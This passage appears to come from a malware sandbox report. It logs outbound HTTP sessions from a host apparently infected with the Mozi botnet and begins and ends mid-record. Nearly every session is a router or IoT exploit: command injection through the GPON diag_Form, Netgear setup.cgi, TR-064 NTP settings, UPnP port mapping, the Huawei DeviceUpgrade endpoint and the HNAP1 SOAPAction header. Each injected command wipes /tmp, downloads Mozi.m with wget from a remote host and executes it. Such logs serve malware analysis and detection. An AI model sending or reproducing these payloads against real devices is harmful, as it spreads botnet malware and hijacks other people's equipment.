                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        96192.168.2.233501245.231.135.1898080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580857038 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        97192.168.2.2347554146.20.246.1885555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580878973 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        98192.168.2.2352578142.230.94.507574
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580909967 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:7574
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        99192.168.2.23556841.213.1.22352869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580935955 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        100192.168.2.233347646.14.252.19480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580960989 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        101192.168.2.2354866212.19.173.1918080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.580981970 CET334OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:8080
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        102192.168.2.233674492.38.181.8752869
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581007004 CET886OUTPOST /picsdesc.xml HTTP/1.1
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: /
                                                                        User-Agent: Hello-World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        103192.168.2.233372422.47.205.19480
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581036091 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        104192.168.2.234790618.48.0.2237215
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581083059 CET818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                        Host: 18.48.0.22:37215
                                                                        Content-Length: 601
                                                                        Connection: keep-alive
                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        105192.168.2.2355996181.78.116.238080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581105947 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        106192.168.2.234496269.200.69.1387574
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581140041 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:7574
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        107192.168.2.2348206209.39.207.1505555
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581166983 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:5555
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        108192.168.2.234548853.254.96.19280
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581197977 CET802OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 53.254.96.192:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        109192.168.2.2341216212.175.190.2880
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.581221104 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
